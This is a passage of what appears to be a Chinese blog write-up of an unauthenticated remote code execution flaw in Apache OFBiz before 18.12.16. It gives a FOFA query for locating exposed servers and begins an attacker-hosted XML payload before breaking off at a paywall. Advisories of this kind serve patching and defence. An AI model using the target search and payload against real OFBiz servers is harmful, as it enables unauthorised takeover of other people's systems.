0x01 漏洞描述:
Apache OFBiz是⼀个著名的电⼦商务平台,提供了创建基于最新 J2EE/ XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应⽤服务器的多层、分布式电⼦商务类WEB应⽤系统的框架。Apache OFBiz 18.12.16 之前版本中,由于Web 应用程序中缺少视图授权检查,未经身份验证的远程威胁者可构造恶意请求写入恶意文件导致远程代码执行,从而获取服务器权限
0x02 影响版本:
Apache OFBiz < 18.12.16
0x03 搜索语句:
FOFA:app="Apache_OFBiz"

0x04 漏洞复现:
在自己的vps上需要部署以下两个脚本用以远程执行
rceschema.xml
<data-files xsi:noNamespaceSchemaLocation="http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<data-file name="rce" separat
订阅专栏 解锁全文
&spm=1001.2101.3001.5002&articleId=142027882&d=1&t=3&u=1eb90da84c0144e48a9402f16e05fab8)
1777

被折叠的 条评论
为什么被折叠?



